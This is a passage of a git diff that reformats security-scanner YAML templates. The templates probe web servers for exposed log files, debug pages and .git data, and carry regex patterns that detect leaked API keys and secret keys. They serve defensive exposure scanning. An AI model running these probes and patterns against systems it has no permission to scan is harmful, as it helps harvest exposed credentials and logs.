tags: exposure,files,yarn http: - - method: GET path: - "{{BaseURL}}/yarn.lock" diff --git a/http/exposures/logs/access-log.yaml b/http/exposures/logs/access-log.yaml index 37b817a8c3..7a0d1f0f13 100644 --- a/http/exposures/logs/access-log.yaml +++ b/http/exposures/logs/access-log.yaml @@ -4,9 +4,9 @@ info: name: Publicly accessible access-log file author: sheikhrishad severity: low - tags: logs,exposure metadata: max-request: 4 + tags: logs,exposure http: - method: GET diff --git a/http/exposures/logs/badarg-log.yaml b/http/exposures/logs/badarg-log.yaml index 7fcf55ebfe..b5c11b12fd 100644 --- a/http/exposures/logs/badarg-log.yaml +++ b/http/exposures/logs/badarg-log.yaml @@ -8,8 +8,8 @@ info: - https://github.com/maurosoria/dirsearch/blob/master/db/dicc.txt - https://www.erlang.org/doc/reference_manual/errors.html metadata: - max-request: 1 verified: true + max-request: 1 github-query: filename:badarg.log tags: exposure,badarg,log,debug diff --git a/http/exposures/logs/clockwork-php-page.yaml b/http/exposures/logs/clockwork-php-page.yaml index 5f7ce80388..9caf5ba198 100644 --- a/http/exposures/logs/clockwork-php-page.yaml +++ b/http/exposures/logs/clockwork-php-page.yaml @@ -6,9 +6,9 @@ info: severity: high reference: - https://twitter.com/damian_89_/status/1250721398747791360 - tags: tech,clockwork,exposure metadata: max-request: 1 + tags: tech,clockwork,exposure http: - method: GET @@ -20,6 +20,7 @@ http: - type: status status: - 200 + - type: word words: - Clockwork diff --git a/http/exposures/logs/darkstat-detect.yaml b/http/exposures/logs/darkstat-detect.yaml index 725cbe37ec..dccf953cad 100644 --- a/http/exposures/logs/darkstat-detect.yaml +++ b/http/exposures/logs/darkstat-detect.yaml @@ -7,15 +7,16 @@ info: description: Darkstat captures network traffic, calculates statistics about usage, and serves reports over HTTP reference: - https://unix4lyfe.org/darkstat/ - tags: darkstat,logs,exposure metadata: max-request: 2 + tags: darkstat,logs,exposure http: - method: GET path: - "{{BaseURL}}" - "{{BaseURL}}/darkstat/" + # FYI, the default port for darkstat is 666 matchers-condition: and matchers: @@ -23,6 +24,7 @@ http: part: header regex: - "[Ss]erver: darkstat.*" + - type: word part: body words: diff --git a/http/exposures/logs/development-logs.yaml b/http/exposures/logs/development-logs.yaml index f677af92c9..e1d57b77e0 100644 --- a/http/exposures/logs/development-logs.yaml +++ b/http/exposures/logs/development-logs.yaml @@ -4,9 +4,9 @@ info: name: Discover development log files author: geeknik severity: info - tags: logs,exposure,rails metadata: max-request: 3 + tags: logs,exposure,rails http: - method: GET diff --git a/http/exposures/logs/django-debug-exposure.yaml b/http/exposures/logs/django-debug-exposure.yaml index 73e7b8bb0f..ae9ca15dca 100644 --- a/http/exposures/logs/django-debug-exposure.yaml +++ b/http/exposures/logs/django-debug-exposure.yaml @@ -6,9 +6,9 @@ info: severity: high reference: - https://twitter.com/Alra3ees/status/1397660633928286208 - tags: django,exposure metadata: max-request: 1 + tags: django,exposure http: - method: POST diff --git a/http/exposures/logs/dozzle-container-logs.yaml b/http/exposures/logs/dozzle-container-logs.yaml index 016c937ddf..0fe95c984b 100644 --- a/http/exposures/logs/dozzle-container-logs.yaml +++ b/http/exposures/logs/dozzle-container-logs.yaml @@ -9,8 +9,8 @@ info: - https://github.com/amir20/dozzle - https://dozzle.dev/ metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"Dozzle" tags: exposure,logs,dozzle,docker diff --git a/http/exposures/logs/elmah-log-file.yaml b/http/exposures/logs/elmah-log-file.yaml index 5d353fead1..16bf10e2c3 100644 --- a/http/exposures/logs/elmah-log-file.yaml +++ b/http/exposures/logs/elmah-log-file.yaml @@ -10,8 +10,8 @@ info: - https://code.google.com/archive/p/elmah/ - https://www.troyhunt.com/aspnet-session-hijacking-with-google/ metadata: - max-request: 2 verified: true + max-request: 2 tags: logs,elmah,exposure http: @@ -23,6 +23,7 @@ http: stop-at-first-match: true host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposures/logs/error-logs.yaml b/http/exposures/logs/error-logs.yaml index 2da2f5ee8b..a45fa10536 100644 --- a/http/exposures/logs/error-logs.yaml +++ b/http/exposures/logs/error-logs.yaml @@ -4,9 +4,9 @@ info: name: Common Error Log Files author: geeknik,daffainfo,ELSFA7110,Hardik-Solanki severity: low - tags: logs,exposure,error metadata: max-request: 29 + tags: logs,exposure,error http: - method: GET @@ -42,6 +42,7 @@ http: - "{{BaseURL}}/{{Hostname}}/errors.log" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposures/logs/event-debug-server-status.yaml b/http/exposures/logs/event-debug-server-status.yaml index 549fc54ed9..6dde5392a1 100644 --- a/http/exposures/logs/event-debug-server-status.yaml +++ b/http/exposures/logs/event-debug-server-status.yaml @@ -5,8 +5,8 @@ info: author: pussycat0x severity: low metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Event Debug Server" tags: event,exposure,debug diff --git a/http/exposures/logs/exposed-glances-api.yaml b/http/exposures/logs/exposed-glances-api.yaml index bd18db7d9f..1204113a01 100644 --- a/http/exposures/logs/exposed-glances-api.yaml +++ b/http/exposures/logs/exposed-glances-api.yaml @@ -7,9 +7,9 @@ info: description: Glances is a cross-platform system monitoring tool written in Python. reference: - https://nicolargo.github.io/glances/ - tags: glances,exposure metadata: max-request: 1 + tags: glances,exposure http: - method: GET diff --git a/http/exposures/logs/fastcgi-echo.yaml b/http/exposures/logs/fastcgi-echo.yaml index 30134a9a1e..ab2ba1580a 100644 --- a/http/exposures/logs/fastcgi-echo.yaml +++ b/http/exposures/logs/fastcgi-echo.yaml @@ -11,8 +11,8 @@ info: - https://www.exploit-db.com/ghdb/183 - https://www.integrigy.com/oracle-application-server-fastcgi-echo-vulnerability-reports metadata: - max-request: 1 verified: true + max-request: 1 google-query: inurl:fcgi-bin/echo tags: exposure,logs,oracle,fastcgi,edb diff --git a/http/exposures/logs/ffserver-status.yaml b/http/exposures/logs/ffserver-status.yaml index 2b2839391f..59bc26bd94 100644 --- a/http/exposures/logs/ffserver-status.yaml +++ b/http/exposures/logs/ffserver-status.yaml @@ -5,8 +5,8 @@ info: author: notnotnotveg,tess severity: low metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"ffserver Status" tags: exposures,logs,ffserver diff --git a/http/exposures/logs/firebase-debug-log.yaml b/http/exposures/logs/firebase-debug-log.yaml index 4edb1347f5..e9789f2194 100644 --- a/http/exposures/logs/firebase-debug-log.yaml +++ b/http/exposures/logs/firebase-debug-log.yaml @@ -7,8 +7,8 @@ info: reference: - https://github.com/maurosoria/dirsearch/blob/master/db/dicc.txt metadata: - max-request: 1 verified: true + max-request: 1 github-query: filename:firebase-debug.log tags: exposure,firebase,logs,debug diff --git a/http/exposures/logs/git-exposure.yaml b/http/exposures/logs/git-exposure.yaml index eeb0801cec..e8e4885563 100644 --- a/http/exposures/logs/git-exposure.yaml +++ b/http/exposures/logs/git-exposure.yaml @@ -5,8 +5,8 @@ info: author: tess severity: medium metadata: - max-request: 1 verified: true + max-request: 1 tags: logs,git,exposure http: @@ -16,6 +16,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposures/logs/git-logs-exposure.yaml b/http/exposures/logs/git-logs-exposure.yaml index 86acc46e09..b428146061 100644 --- a/http/exposures/logs/git-logs-exposure.yaml +++ b/http/exposures/logs/git-logs-exposure.yaml @@ -5,9 +5,9 @@ info: author: NullFuzz severity: info description: Searches Git Logs files and passed URLs. - tags: logs,git,exposure metadata: max-request: 1 + tags: logs,git,exposure http: - method: GET diff --git a/http/exposures/logs/idea-logs-exposure.yaml b/http/exposures/logs/idea-logs-exposure.yaml index 2296246341..2c35628e5a 100644 --- a/http/exposures/logs/idea-logs-exposure.yaml +++ b/http/exposures/logs/idea-logs-exposure.yaml @@ -5,9 +5,9 @@ info: author: martincodes-de severity: info description: Searches for .idea Folder for http-requests-log.http and http-client.cookies file - tags: phpstorm,jetbrains,idea,exposure metadata: max-request: 2 + tags: phpstorm,jetbrains,idea,exposure http: - method: GET @@ -24,5 +24,5 @@ http: - type: word words: - - "# domain path name value date" + - "# domain\tpath\tname\tvalue\tdate" part: body diff --git a/http/exposures/logs/jboss-seam-debug-page.yaml b/http/exposures/logs/jboss-seam-debug-page.yaml index cf1092c420..0fbd3ce4f3 100644 --- a/http/exposures/logs/jboss-seam-debug-page.yaml +++ b/http/exposures/logs/jboss-seam-debug-page.yaml @@ -6,9 +6,9 @@ info: severity: medium reference: - https://github.com/jaeles-project/jaeles-signatures/blob/master/common/jboss-seam-debug-page.yaml - tags: jboss,logs,exposure metadata: max-request: 1 + tags: jboss,logs,exposure http: - method: GET diff --git a/http/exposures/logs/laravel-log-file.yaml b/http/exposures/logs/laravel-log-file.yaml index 7dc88131bf..2004151de0 100644 --- a/http/exposures/logs/laravel-log-file.yaml +++ b/http/exposures/logs/laravel-log-file.yaml @@ -7,9 +7,9 @@ info: description: The log file of this Laravel web app might reveal details on the inner workings of the app, possibly even tokens, credentials or personal information. reference: - https://laravel.com/docs/master/logging - tags: laravel,logs,exposure metadata: max-request: 1 + tags: laravel,logs,exposure http: - method: GET @@ -26,12 +26,14 @@ http: - "ErrorException" - "syntax error" condition: or + - type: word part: header words: - "text/plain" - "text/x-log" condition: or + - type: status status: - 200 diff --git a/http/exposures/logs/laravel-telescope.yaml b/http/exposures/logs/laravel-telescope.yaml index 28e334a284..eee2434d1b 100644 --- a/http/exposures/logs/laravel-telescope.yaml +++ b/http/exposures/logs/laravel-telescope.yaml @@ -4,13 +4,12 @@ info: name: Laravel Telescope Disclosure author: geeknik severity: medium - description: Telescope provides insight into the requests coming into your application, exceptions, log entries, database queries, queued jobs, mail, notifications, cache operations, scheduled tasks, variable dumps, - and more. + description: Telescope provides insight into the requests coming into your application, exceptions, log entries, database queries, queued jobs, mail, notifications, cache operations, scheduled tasks, variable dumps, and more. reference: - https://laravel.com/docs/8.x/telescope - tags: laravel,disclosure,logs,exposure metadata: max-request: 1 + tags: laravel,disclosure,logs,exposure http: - method: GET diff --git a/http/exposures/logs/milesight-system-log.yaml b/http/exposures/logs/milesight-system-log.yaml index f3f58f52a9..83c3cc80ec 100644 --- a/http/exposures/logs/milesight-system-log.yaml +++ b/http/exposures/logs/milesight-system-log.yaml @@ -9,8 +9,8 @@ info: reference: - https://medium.com/@win3zz/inside-the-router-how-i-accessed-industrial-routers-and-reported-the-flaws-29c34213dfdf metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:rt_title google-query: '"/lang/log/system" ext:log' tags: milesight,log,exposure diff --git a/http/exposures/logs/nginx-shards.yaml b/http/exposures/logs/nginx-shards.yaml index c21a591f92..2e1ffa4973 100644 --- a/http/exposures/logs/nginx-shards.yaml +++ b/http/exposures/logs/nginx-shards.yaml @@ -18,6 +18,7 @@ http: - "{{BaseURL}}/static/shards/html" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposures/logs/npm-debug-log.yaml b/http/exposures/logs/npm-debug-log.yaml index 684a39efd7..9f44b506c5 100644 --- a/http/exposures/logs/npm-debug-log.yaml +++ b/http/exposures/logs/npm-debug-log.yaml @@ -8,8 +8,8 @@ info: - https://github.com/maurosoria/dirsearch/blob/master/db/dicc.txt - https://docs.npmjs.com/generating-and-locating-npm-debug.log-files metadata: - max-request: 2 verified: true + max-request: 2 github-query: filename:npm-debug.log tags: exposure,npm,logs,debug @@ -20,6 +20,7 @@ http: - "{{BaseURL}}/assets/npm-debug.log" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposures/logs/npm-log-file.yaml b/http/exposures/logs/npm-log-file.yaml index 0e1ccda925..d10317b277 100644 --- a/http/exposures/logs/npm-log-file.yaml +++ b/http/exposures/logs/npm-log-file.yaml @@ -7,8 +7,8 @@ info: reference: - https://github.com/maurosoria/dirsearch/blob/master/db/dicc.txt metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: html:"npm-debug.log" tags: npm,logs,exposure @@ -19,6 +19,7 @@ http: - "{{BaseURL}}/assets/npm-debug.log" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposures/logs/opentsdb-status.yaml b/http/exposures/logs/opentsdb-status.yaml index 46392067e5..20465fcbc7 100644 --- a/http/exposures/logs/opentsdb-status.yaml +++ b/http/exposures/logs/opentsdb-status.yaml @@ -5,10 +5,10 @@ info: author: pussycat0x severity: low reference: | - http://opentsdb.net/ + http://opentsdb.net/ metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.favicon.hash:407286339 tags: opentsdb,exposure,logs diff --git a/http/exposures/logs/oracle-ebs-sqllog-disclosure.yaml b/http/exposures/logs/oracle-ebs-sqllog-disclosure.yaml index f1e8195ecf..52cd5344f9 100644 --- a/http/exposures/logs/oracle-ebs-sqllog-disclosure.yaml +++ b/http/exposures/logs/oracle-ebs-sqllog-disclosure.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 - tags: oracle,ebs,logs,exposure metadata: max-request: 1 + tags: oracle,ebs,logs,exposure http: - method: GET diff --git a/http/exposures/logs/php-debug-bar.yaml b/http/exposures/logs/php-debug-bar.yaml index c07899b803..62157375c9 100644 --- a/http/exposures/logs/php-debug-bar.yaml +++ b/http/exposures/logs/php-debug-bar.yaml @@ -5,9 +5,9 @@ info: author: dhiyaneshDk severity: high description: The PHP Debug Bar tool was discovered, which allows the attacker to obtain sensitive information, e.g. application configuration. - tags: debug,logs,exposure metadata: max-request: 1 + tags: debug,logs,exposure http: - method: GET diff --git a/http/exposures/logs/production-log.yaml b/http/exposures/logs/production-log.yaml index a97a9653cc..e554650e01 100644 --- a/http/exposures/logs/production-log.yaml +++ b/http/exposures/logs/production-log.yaml @@ -5,8 +5,8 @@ info: author: geeknik severity: low metadata: - max-request: 3 verified: true + max-request: 3 github-query: filename:production.log Connecting to database specified by database.yml tags: exposure,files,logs @@ -18,6 +18,7 @@ http: - '{{BaseURL}}/production.log' stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposures/logs/production-logs.yaml b/http/exposures/logs/production-logs.yaml index 9e725d5f7e..fb94559244 100644 --- a/http/exposures/logs/production-logs.yaml +++ b/http/exposures/logs/production-logs.yaml @@ -4,9 +4,9 @@ info: name: Discover production log files author: geeknik severity: info - tags: exposure,logs,rails metadata: max-request: 3 + tags: exposure,logs,rails http: - method: GET diff --git a/http/exposures/logs/pyramid-debug-toolbar.yaml b/http/exposures/logs/pyramid-debug-toolbar.yaml index 80860eb036..baad38440b 100644 --- a/http/exposures/logs/pyramid-debug-toolbar.yaml +++ b/http/exposures/logs/pyramid-debug-toolbar.yaml @@ -7,9 +7,9 @@ info: description: Pyramid Debug Toolbar provides a debug toolbar useful while you are developing your Pyramid application. reference: - https://github.com/Pylons/pyramid_debugtoolbar - tags: pyramid,logs,exposure metadata: max-request: 1 + tags: pyramid,logs,exposure http: - method: GET diff --git a/http/exposures/logs/rails-debug-mode.yaml b/http/exposures/logs/rails-debug-mode.yaml index 5597617214..7bab442aca 100644 --- a/http/exposures/logs/rails-debug-mode.yaml +++ b/http/exposures/logs/rails-debug-mode.yaml @@ -4,9 +4,9 @@ info: name: Rails Debug Mode author: pdteam severity: medium - tags: debug,rails,exposure metadata: max-request: 1 + tags: debug,rails,exposure,intrusive http: - method: GET @@ -19,4 +19,4 @@ http: words: - "Rails.root:" - "Action Controller: Exception caught" - condition: and \ No newline at end of file + condition: and diff --git a/http/exposures/logs/redis-exception-error.yaml b/http/exposures/logs/redis-exception-error.yaml index f11abe9f33..eebd081366 100644 --- a/http/exposures/logs/redis-exception-error.yaml +++ b/http/exposures/logs/redis-exception-error.yaml @@ -7,8 +7,8 @@ info: reference: - https://www.facebook.com/ExWareLabs/photos/pcb.5563308760399619/5563307330399762/ metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"redis.exceptions.ConnectionError" tags: exposure,redis,logs diff --git a/http/exposures/logs/roundcube-log-disclosure.yaml b/http/exposures/logs/roundcube-log-disclosure.yaml index eecd2e169c..2061d1a6ef 100644 --- a/http/exposures/logs/roundcube-log-disclosure.yaml +++ b/http/exposures/logs/roundcube-log-disclosure.yaml @@ -6,9 +6,9 @@ info: severity: medium reference: - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/roundcube-log-disclosure.json - tags: exposure,logs metadata: max-request: 12 + tags: exposure,logs http: - method: GET @@ -29,8 +29,8 @@ http: - logs/sendmail - logs/errors.log - logs/errors - max-size: 1000 + matchers-condition: and matchers: - type: word @@ -51,4 +51,4 @@ http: extractors: - type: dsl dsl: - - content_length \ No newline at end of file + - content_length diff --git a/http/exposures/logs/squid-analysis-report-generator.yaml b/http/exposures/logs/squid-analysis-report-generator.yaml index 351f87333d..26acdb22eb 100644 --- a/http/exposures/logs/squid-analysis-report-generator.yaml +++ b/http/exposures/logs/squid-analysis-report-generator.yaml @@ -4,13 +4,12 @@ info: name: Squid Analysis Report Generator author: geeknik severity: high - description: SARG is an open source tool that allows you to analyse the squid log files and generates beautiful reports in HTML format with information about users, IP addresses, top accessed sites, total bandwidth - usage, elapsed time, downloads, access denied websites, daily reports, weekly reports and monthly reports. + description: SARG is an open source tool that allows you to analyse the squid log files and generates beautiful reports in HTML format with information about users, IP addresses, top accessed sites, total bandwidth usage, elapsed time, downloads, access denied websites, daily reports, weekly reports and monthly reports. reference: - https://sourceforge.net/projects/sarg/ - tags: sarg,exposure,logs metadata: max-request: 1 + tags: sarg,exposure,logs http: - method: GET @@ -25,6 +24,7 @@ http: - "Squid User Access Report" - "Squid User's Access Report" condition: or + - type: word part: body words: diff --git a/http/exposures/logs/struts-debug-mode.yaml b/http/exposures/logs/struts-debug-mode.yaml index 17c256df4c..f7d44092e3 100644 --- a/http/exposures/logs/struts-debug-mode.yaml +++ b/http/exposures/logs/struts-debug-mode.yaml @@ -4,9 +4,9 @@ info: name: Apache Struts setup in Debug-Mode author: pdteam severity: low - tags: logs,struts,apache,exposure,setup metadata: max-request: 1 + tags: logs,struts,apache,exposure,setup http: - method: GET diff --git a/http/exposures/logs/struts-problem-report.yaml b/http/exposures/logs/struts-problem-report.yaml index 6ce8d28fb6..22f97d3c03 100644 --- a/http/exposures/logs/struts-problem-report.yaml +++ b/http/exposures/logs/struts-problem-report.yaml @@ -7,9 +7,9 @@ info: description: Multiple Apache Struts applications were detected in dev-mode. reference: - https://www.exploit-db.com/ghdb/4278 - tags: struts,debug,edb,exposure,apache metadata: max-request: 1 + tags: struts,debug,edb,exposure,apache http: - method: GET diff --git a/http/exposures/logs/trace-axd-detect.yaml b/http/exposures/logs/trace-axd-detect.yaml index 57493d8339..9d17270012 100644 --- a/http/exposures/logs/trace-axd-detect.yaml +++ b/http/exposures/logs/trace-axd-detect.yaml @@ -6,9 +6,9 @@ info: severity: low reference: - https://www.rapid7.com/db/vulnerabilities/spider-asp-dot-net-trace-axd/ - tags: logs,asp,exposure metadata: max-request: 1 + tags: logs,asp,exposure http: - method: GET @@ -23,4 +23,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/exposures/logs/webalizer-xtended-stats.yaml b/http/exposures/logs/webalizer-xtended-stats.yaml index 5fe5efd533..716b33ffcc 100644 --- a/http/exposures/logs/webalizer-xtended-stats.yaml +++ b/http/exposures/logs/webalizer-xtended-stats.yaml @@ -7,8 +7,8 @@ info: reference: - https://www.patrickfrei.ch/webalizer/ metadata: - max-request: 1 verified: true + max-request: 1 google-query: inurl:"/usage/error_202109.html" tags: exposure,stats,webalizer diff --git a/http/exposures/logs/wp-app-log.yaml b/http/exposures/logs/wp-app-log.yaml index f33756f699..885cc269a7 100644 --- a/http/exposures/logs/wp-app-log.yaml +++ b/http/exposures/logs/wp-app-log.yaml @@ -4,9 +4,9 @@ info: name: Discover wp-app.log Files author: geeknik severity: info - tags: exposure,logs metadata: max-request: 1 + tags: exposure,logs http: - method: GET diff --git a/http/exposures/logs/ws-ftp-log.yaml b/http/exposures/logs/ws-ftp-log.yaml index 75b1515d2b..06b36b12e8 100644 --- a/http/exposures/logs/ws-ftp-log.yaml +++ b/http/exposures/logs/ws-ftp-log.yaml @@ -5,8 +5,8 @@ info: author: Hardik-Solanki severity: low metadata: - max-request: 2 verified: true + max-request: 2 google-query: intitle:"Index of" ws_ftp.log tags: exposure,ftp,logs @@ -17,6 +17,7 @@ http: - '{{BaseURL}}/WS_FTP.LOG' stop-at-first-match: true + matchers-condition: and matchers: - type: regex diff --git a/http/exposures/logs/yii-error-page.yaml b/http/exposures/logs/yii-error-page.yaml index f7b79bc774..2d48de3b2f 100644 --- a/http/exposures/logs/yii-error-page.yaml +++ b/http/exposures/logs/yii-error-page.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDk severity: unknown metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"yii\base\ErrorException" tags: exposure,yii,logs diff --git a/http/exposures/logs/zm-system-log-detect.yaml b/http/exposures/logs/zm-system-log-detect.yaml index ed35e76cc3..a0a2a09b3a 100644 --- a/http/exposures/logs/zm-system-log-detect.yaml +++ b/http/exposures/logs/zm-system-log-detect.yaml @@ -5,9 +5,9 @@ info: author: pussycat0x severity: low reference: https://www.exploit-db.com/ghdb/6926 - tags: logs,zm,exposure metadata: max-request: 2 + tags: logs,zm,exposure http: - method: GET @@ -16,6 +16,7 @@ http: - "{{BaseURL}}/zm/?view=log" stop-at-first-match: true + matchers-condition: and matchers: - type: word @@ -24,4 +25,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/exposures/tokens/adafruit/adafruit-api-key.yaml b/http/exposures/tokens/adafruit/adafruit-api-key.yaml index 23d0721e95..ca92ddbd73 100644 --- a/http/exposures/tokens/adafruit/adafruit-api-key.yaml +++ b/http/exposures/tokens/adafruit/adafruit-api-key.yaml @@ -8,8 +8,8 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/adafruit-api-key.yaml - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/adafruit-api-key.go metadata: - max-request: 1 verified: true + max-request: 1 tags: adafruit,exposure,tokens http: @@ -21,4 +21,4 @@ http: - type: regex part: body regex: - - (?i)(?:adafruit)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9_-]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:adafruit)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9_-]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/http/exposures/tokens/adobe/adobe-client-id.yaml b/http/exposures/tokens/adobe/adobe-client-id.yaml index 94b313aea4..81c7e4a97a 100644 --- a/http/exposures/tokens/adobe/adobe-client-id.yaml +++ b/http/exposures/tokens/adobe/adobe-client-id.yaml @@ -21,4 +21,4 @@ http: - type: regex part: body regex: - - (?i)(?:adobe)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-f0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:adobe)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-f0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/http/exposures/tokens/adobe/adobe-oauth-secret.yaml b/http/exposures/tokens/adobe/adobe-oauth-secret.yaml index 774c4de47f..b824aa29b8 100644 --- a/http/exposures/tokens/adobe/adobe-oauth-secret.yaml +++ b/http/exposures/tokens/adobe/adobe-oauth-secret.yaml @@ -10,8 +10,8 @@ info: - https://developer.adobe.com/developer-console/docs/guides/authentication/OAuthIntegration/ - https://developer.adobe.com/developer-console/docs/guides/authentication/OAuth/ metadata: - max-request: 1 verified: true + max-request: 1 tags: adobe,oauth,exposure,tokens http: @@ -23,4 +23,4 @@ http: - type: regex part: body regex: - - '(?i)\b(p8e-[a-z0-9-]{32})(?:[^a-z0-9-]|$)' \ No newline at end of file + - '(?i)\b(p8e-[a-z0-9-]{32})(?:[^a-z0-9-]|$)' diff --git a/http/exposures/tokens/age/age-public-key.yaml b/http/exposures/tokens/age/age-public-key.yaml index 9968a14e1a..02f4cab1d4 100644 --- a/http/exposures/tokens/age/age-public-key.yaml +++ b/http/exposures/tokens/age/age-public-key.yaml @@ -9,8 +9,8 @@ info: - https://github.com/FiloSottile/age/blob/main/doc/age.1.html - https://github.com/C2SP/C2SP/blob/8b6a842e0360d35111c46be2a8019b2276295914/age.md#the-x25519-recipient-type metadata: - max-request: 1 verified: true + max-request: 1 tags: age-encryption,exposure,tokens http: @@ -22,4 +22,4 @@ http: - type: regex part: body regex: - - '\bage1[0-9a-z]{58}\b' \ No newline at end of file + - '\bage1[0-9a-z]{58}\b' diff --git a/http/exposures/tokens/age/age-secret-key.yaml b/http/exposures/tokens/age/age-secret-key.yaml index cbd1f2c2cb..9dcea8b1cf 100644 --- a/http/exposures/tokens/age/age-secret-key.yaml +++ b/http/exposures/tokens/age/age-secret-key.yaml @@ -9,8 +9,8 @@ info: - https://github.com/FiloSottile/age/blob/main/doc/age.1.html - https://github.com/C2SP/C2SP/blob/8b6a842e0360d35111c46be2a8019b2276295914/age.md#the-x25519-recipient-type metadata: - max-request: 1 verified: true + max-request: 1 tags: age-encryption,exposure,tokens http: @@ -22,4 +22,4 @@ http: - type: regex part: body regex: - - '\bAGE-SECRET-KEY-1[0-9A-Z]{58}\b' \ No newline at end of file + - '\bAGE-SECRET-KEY-1[0-9A-Z]{58}\b' diff --git a/http/exposures/tokens/airtable/airtable-api-key.yaml b/http/exposures/tokens/airtable/airtable-api-key.yaml index a24d23940b..110b309f03 100644 --- a/http/exposures/tokens/airtable/airtable-api-key.yaml +++ b/http/exposures/tokens/airtable/airtable-api-key.yaml @@ -21,4 +21,4 @@ http: - type: regex part: body regex: - - (?i)(?:airtable)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{17})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:airtable)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{17})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/http/exposures/tokens/algolia/algolia-api-key.yaml b/http/exposures/tokens/algolia/algolia-api-key.yaml index 5730442639..c820c65ba7 100644 --- a/http/exposures/tokens/algolia/algolia-api-key.yaml +++ b/http/exposures/tokens/algolia/algolia-api-key.yaml @@ -8,8 +8,8 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/algolia-api-key.yaml - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/algolia-api-key.go metadata: - max-request: 1 verified: true + max-request: 1 tags: algolia,exposure,tokens http: @@ -21,4 +21,4 @@ http: - type: regex part: body regex: - - (?i)(?:algolia)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:algolia)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/http/exposures/tokens/alibaba/alibaba-accesskey-id.yaml b/http/exposures/tokens/alibaba/alibaba-accesskey-id.yaml index 2f24f2c263..45be41bc6a 100644 --- a/http/exposures/tokens/alibaba/alibaba-accesskey-id.yaml +++ b/http/exposures/tokens/alibaba/alibaba-accesskey-id.yaml @@ -8,8 +8,8 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/alibaba-access-key-id.yaml - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/alibaba-access-key-id.go metadata: - max-request: 1 verified: true + max-request: 1 tags: alibaba,exposure,tokens http: @@ -21,4 +21,4 @@ http: - type: regex part: body regex: - - (?i)\b((LTAI)(?i)[a-z0-9]{20})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)\b((LTAI)(?i)[a-z0-9]{20})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/http/exposures/tokens/alibaba/alibaba-secretkey-id.yaml b/http/exposures/tokens/alibaba/alibaba-secretkey-id.yaml index a60e6e5a68..ad4cb9b4b9 100644 --- a/http/exposures/tokens/alibaba/alibaba-secretkey-id.yaml +++ b/http/exposures/tokens/alibaba/alibaba-secretkey-id.yaml @@ -8,8 +8,8 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/alibaba-secret-key.go - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/alibaba-secret-key.yaml metadata: - max-request: 1 verified: true + max-request: 1 tags: alibaba,exposure,tokens http: @@ -21,4 